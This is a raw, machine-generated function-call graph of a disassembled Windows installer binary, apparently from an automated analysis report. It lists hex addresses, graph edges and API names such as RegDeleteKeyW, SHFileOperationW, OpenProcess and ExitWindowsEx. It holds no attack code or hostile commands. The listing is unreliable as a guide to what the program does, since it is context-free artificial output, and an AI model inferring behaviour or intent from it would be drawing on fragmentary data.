4066dd FreeLibrary 4468->4471 4474 4064aa 4469->4474 4477 4065f5 4469->4477 4470->4462 4473 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4470->4473 4471->4462 4472 406651 FreeLibrary 4481 40662a 4472->4481 4473->4477 4475 4064ce FreeLibrary GlobalFree 4474->4475 4474->4477 4483 4064ea 4474->4483 4475->4462 4476 4066ea 4479 4066ef CloseHandle FreeLibrary 4476->4479 4477->4472 4477->4481 4478 4064fc lstrcpyW OpenProcess 4480 40654f CloseHandle CharUpperW lstrcmpW 4478->4480 4478->4483 4482 406704 CloseHandle 4479->4482 4480->4477 4480->4483 4481->4476 4484 406685 lstrcmpW 4481->4484 4485 4066b6 CloseHandle 4481->4485 4486 4066d4 CloseHandle 4481->4486 4482->4479 4483->4468 4483->4478 4483->4480 4484->4481 4484->4482 4485->4481 4486->4471 4487->4458 4488->4461 4489 407752 4493 407344 4489->4493 4490 407c6d 4491 4073c2 GlobalFree 4492 4073cb GlobalAlloc 4491->4492 4492->4490 4492->4493 4493->4490 4493->4491 4493->4492 4493->4493 4494 407443 GlobalAlloc 4493->4494 4495 40743a GlobalFree 4493->4495 4494->4490 4494->4493 4495->4494 4496 401dd3 4497 401446 18 API calls 4496->4497 4498 401dda 4497->4498 4499 401446 18 API calls 4498->4499 4500 4018d3 4499->4500 4508 402e55 4509 40145c 18 API calls 4508->4509 4510 402e63 4509->4510 4511 402e79 4510->4511 4512 40145c 18 API calls 4510->4512 4513 405e30 2 API calls 4511->4513 4512->4511 4514 402e7f 4513->4514 4538 405e50 GetFileAttributesW CreateFileW 4514->4538 4516 402e8c 4517 402f35 4516->4517 4518 402e98 GlobalAlloc 4516->4518 4521 4062a3 11 API calls 4517->4521 4519 402eb1 4518->4519 4520 402f2c CloseHandle 4518->4520 4539 403368 SetFilePointer 4519->4539 4520->4517 4523 402f45 4521->4523 4525 402f50 DeleteFileW 4523->4525 4526 402f63 4523->4526 4524 402eb7 4528 403336 ReadFile 4524->4528 4525->4526 4540 401435 4526->4540 4529 402ec0 GlobalAlloc 4528->4529 4530 402ed0 4529->4530 4531 402f04 WriteFile GlobalFree 4529->4531 4532 40337f 37 API calls 4530->4532 4533 40337f 37 API calls 4531->4533 4537 402edd 4532->4537 4534 402f29 4533->4534 4534->4520 4536 402efb GlobalFree 4536->4531 4537->4536 4538->4516 4539->4524 4541 404f72 25 API calls 4540->4541 4542 401443 4541->4542 4543 401cd5 4544 401446 18 API calls 4543->4544 4545 401cdd 4544->4545 4546 401446 18 API calls 4545->4546 4547 401ce8 4546->4547 4548 40145c 18 API calls 4547->4548 4549 401cf1 4548->4549 4550 401d07 lstrlenW 4549->4550 4551 401d43 4549->4551 4552 401d11 4550->4552 4552->4551 4556 406009 lstrcpynW 4552->4556 4554 401d2c 4554->4551 4555 401d39 lstrlenW 4554->4555 4555->4551 4556->4554 4557 403cd6 4558 403ce1 4557->4558 4559 403ce5 4558->4559 4560 403ce8 GlobalAlloc 4558->4560 4560->4559 4561 402cd7 4562 401446 18 API calls 4561->4562 4565 402c64 4562->4565 4563 402d99 4564 402d17 ReadFile 4564->4565 4565->4561 4565->4563 4565->4564 4566 402dd8 4567 402ddf 4566->4567 4568 4030e3 4566->4568 4569 402de5 FindClose 4567->4569 4569->4568 4570 401d5c 4571 40145c 18 API calls 4570->4571 4572 401d63 4571->4572 4573 40145c 18 API calls 4572->4573 4574 401d6c 4573->4574 4575 401d73 lstrcmpiW 4574->4575 4576 401d86 lstrcmpW 4574->4576 4577 401d79 4575->4577 4576->4577 4578 401c99 4576->4578 4577->4576 4577->4578 4280 407c5f 4281 407344 4280->4281 4282 4073c2 GlobalFree 4281->4282 4283 4073cb GlobalAlloc 4281->4283 4284 407c6d 4281->4284 4285 407443 GlobalAlloc 4281->4285 4286 40743a GlobalFree 4281->4286 4282->4283 4283->4281 4283->4284 4285->4281 4285->4284 4286->4285 4579 404363 4580 404373 4579->4580 4581 40439c 4579->4581 4583 403d3f 19 API calls 4580->4583 4582 403dca 8 API calls 4581->4582 4584 4043a8 4582->4584 4585 404380 SetDlgItemTextW 4583->4585 4585->4581 4586 4027e3 4587 4027e9 4586->4587 4588 4027f2 4587->4588 4589 402836 4587->4589 4602 401553 4588->4602 4590 40145c 18 API calls 4589->4590 4592 40283d 4590->4592 4594 4062a3 11 API calls 4592->4594 4593 4027f9 4595 40145c 18 API calls 4593->4595 4600 401a13 4593->4600 4596 40284d 4594->4596 4597 40280a RegDeleteValueW 4595->4597 4606 40149d RegOpenKeyExW 4596->4606 4598 4062a3 11 API calls 4597->4598 4601 40282a RegCloseKey 4598->4601 4601->4600 4603 401563 4602->4603 4604 40145c 18 API calls 4603->4604 4605 401589 RegOpenKeyExW 4604->4605 4605->4593 4612 401515 4606->4612 4614 4014c9 4606->4614 4607 4014ef RegEnumKeyW 4608 401501 RegCloseKey 4607->4608 4607->4614 4609 4062fc 3 API calls 4608->4609 4611 401511 4609->4611 4610 401526 RegCloseKey 4610->4612 4611->4612 4615 401541 RegDeleteKeyW 4611->4615 4612->4600 4613 40149d 3 API calls 4613->4614 4614->4607 4614->4608 4614->4610 4614->4613 4615->4612 4616 403f64 4617 403f90 4616->4617 4618 403f74 4616->4618 4620 403fc3 4617->4620 4621 403f96 SHGetPathFromIDListW 4617->4621 4627 405c84 GetDlgItemTextW 4618->4627 4623 403fad SendMessageW 4621->4623 4624 403fa6 4621->4624 4622 403f81 SendMessageW 4622->4617 4623->4620 4625 40141d 80 API calls 4624->4625 4625->4623 4627->4622 4628 402ae4 4629 402aeb 4628->4629 4630 4030e3 4628->4630 4631 402af2 CloseHandle 4629->4631 4631->4630 4632 402065 4633 401446 18 API calls 4632->4633 4634 40206d 4633->4634 4635 401446 18 API calls 4634->4635 4636 402076 GetDlgItem 4635->4636 4637 4030dc 4636->4637 4638 4030e3 4637->4638 4640 405f51 wsprintfW 4637->4640 4640->4638 4641 402665 4642 40145c 18 API calls 4641->4642 4643 40266b 4642->4643 4644 40145c 18 API calls 4643->4644 4645 402674 4644->4645 4646 40145c 18 API calls 4645->4646 4647 40267d 4646->4647 4648 4062a3 11 API calls 4647->4648 4649 40268c 4648->4649 4650 4062d5 2 API calls 4649->4650 4651 402695 4650->4651 4652 4026a6 lstrlenW lstrlenW 4651->4652 4653 404f72 25 API calls 4651->4653 4656 4030e3 4651->4656 4654 404f72 25 API calls 4652->4654 4653->4651 4655 4026e8 SHFileOperationW 4654->4655 4655->4651 4655->4656 4664 401c69 4665 40145c 18 API calls 4664->4665 4666 401c70 4665->4666 4667 4062a3 11 API calls 4666->4667 4668 401c80 4667->4668 4669 405ca0 MessageBoxIndirectW 4668->4669 4670 401a13 4669->4670 4678 402f6e 4679 402f72 4678->4679 4680 402fae 4678->4680 4681 4062a3 11 API calls 4679->4681 4682 40145c 18 API calls 4680->4682 4683 402f7d 4681->4683 4688 402f9d 4682->4688 4684 4062a3 11 API calls 4683->4684 4685 402f90 4684->4685 4686 402fa2 4685->4686 4687 402f98 4685->4687 4690 4060e7 9 API calls 4686->4690 4689 403e74 5 API calls 4687->4689 4689->4688 4690->4688 4691 4023f0 4692 402403 4691->4692 4693 4024da 4691->4693 4694 40145c 18 API calls 4692->4694 4695 404f72 25 API calls 4693->4695 4696 40240a 4694->4696 4701 4024f1 4695->4701 4697 40145c 18 API calls 4696->4697 4698 402413 4697->4698 4699 402429 LoadLibraryExW 4698->4699 4700 40241b GetModuleHandleW 4698->4700 4702 40243e 4699->4702 4703 4024ce 4699->4703 4700->4699 4700->4702 4715 406365 GlobalAlloc WideCharToMultiByte 4702->4715 4704 404f72 25 API calls 4703->4704 4704->4693 4706 402449 4707 40248c 4706->4707 4708 40244f 4706->4708 4709 404f72 25 API calls 4707->4709 4711 401435 25 API calls 4708->4711 4713 40245f 4708->4713 4710 402496 4709->4710 4712 4062a3 11 API calls 4710->4712 4711->4713 4712->4713 4713->4701 4714 4024c0 FreeLibrary 4713->4714 4714->4701 4716 406390 GetProcAddress 4715->4716 4717 40639d GlobalFree 4715->4717 4716->4717 4717->4706 4718 402df3 4719 402dfa 4718->4719 4721 4019ec 4718->4721 4720 402e07 FindNextFileW 4719->4720 4720->4721 4722 402e16 4720->4722 4724 406009 lstrcpynW 4722->4724 4724->4721 4077 402175 4078 401446 18 API calls 4077->4078 4079 40217c 4078->4079 4080 401446 18 API calls 4079->4080 4081 402186 4080->4081 4082 4062a3 11 API calls 4081->4082 4086 402197 4081->4086 4082->4086 4083 4021aa EnableWindow 4085 4030e3 4083->4085 4084 40219f ShowWindow 4084->4085 4086->4083 4086->4084 4732 404077 4733 404081 4732->4733 4734 404084 lstrcpynW lstrlenW 4732->4734 4733->4734 4103 405479 4104 405491 4103->4104 4105 4055cd 4103->4105 4104->4105 4106 40549d 4104->4106 4107 40561e 4105->4107 4108 4055de GetDlgItem GetDlgItem 4105->4108 4109 4054a8 SetWindowPos 4106->4109 4110 4054bb 4106->4110 4112 405678 4107->4112 4120 40139d 80 API calls 4107->4120 4173 403d3f 4108->4173 4109->4110 4114 4054c0 ShowWindow 4110->4114 4115 4054d8 4110->4115 4113 403daf SendMessageW 4112->4113 4133 4055c8 4112->4133 4143 40568a 4113->4143 4114->4115 4117 4054e0 DestroyWindow 4115->4117 4118 4054fa 4115->4118 4116 405608 KiUserCallbackDispatcher 4119 40141d 80 API calls 4116->4119 4172 4058dc 4117->4172 4121 405510 4118->4121 4122 4054ff SetWindowLongW 4118->4122 4119->4107 4123 405650 4120->4123 4126 4055b9 4121->4126 4127 40551c GetDlgItem 4121->4127 4122->4133 4123->4112 4128 405654 SendMessageW 4123->4128 4124 40141d 80 API calls 4124->4143 4125 4058de DestroyWindow KiUserCallbackDispatcher 4125->4172 4182 403dca 4126->4182 4131 40554c 4127->4131 4132 40552f SendMessageW IsWindowEnabled 4127->4132 4128->4133 4130 40590d ShowWindow 4130->4133 4135 405559 4131->4135 4136 4055a0 SendMessageW 4131->4136 4137 40556c 4131->4137 4146 405551 4131->4146 4132->4131 4132->4133 4134 406805 18 API calls 4134->4143 4135->4136 4135->4146 4136->4126 4140 405574 4137->4140 4141 405589 4137->4141 4139 403d3f 19 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4142 405587 4142->4126 4143->4124 4143->4125 4143->4133 4143->4134 4143->4139 4148 403d3f 19 API calls 4143->4148 4163 40581e DestroyWindow 4143->4163 4144->4146 4147 405590 4145->4147 4179 403d18 4146->4179 4147->4126 4147->4146 4149 405705 GetDlgItem 4148->4149 4150 405723 ShowWindow KiUserCallbackDispatcher 4149->4150 4151 40571a 4149->4151 4176 403d85 KiUserCallbackDispatcher 4150->4176 4151->4150 4153 40574d EnableWindow 4156 405761 4153->4156 4154 405766 GetSystemMenu EnableMenuItem SendMessageW 4155 405796 SendMessageW 4154->4155 4154->4156 4155->4156 4156->4154 4177 403d98 SendMessageW 4156->4177 4178 406009 lstrcpynW 4156->4178 4159 4057c4 lstrlenW 4160 406805 18 API calls 4159->4160 4161 4057da SetWindowTextW 4160->4161 4162 40139d 80 API calls 4161->4162 4162->4143 4164 405838 CreateDialogParamW 4163->4164 4163->4172 4165 40586b 4164->4165 4164->4172 4166 403d3f 19 API calls 4165->4166 4167 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4166->4167 4168 40139d 80 API calls 4167->4168 4169 4058bc 4168->4169 4169->4133 4170 4058c4 ShowWindow 4169->4170 4171 403daf SendMessageW 4170->4171 4171->4172 4172->4130 4172->4133 4174 406805 18 API calls 4173->4174 4175 403d4a SetDlgItemTextW 4174->4175 4175->4116 4176->4153 4177->4156 4178->4159 4180 403d25 SendMessageW 4179->4180 4181 403d1f 4179->4181 4180->4142 4181->4180 4183 403ddf GetWindowLongW 4182->4183 4193 403e68 4182->4193 4184 403df0 4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523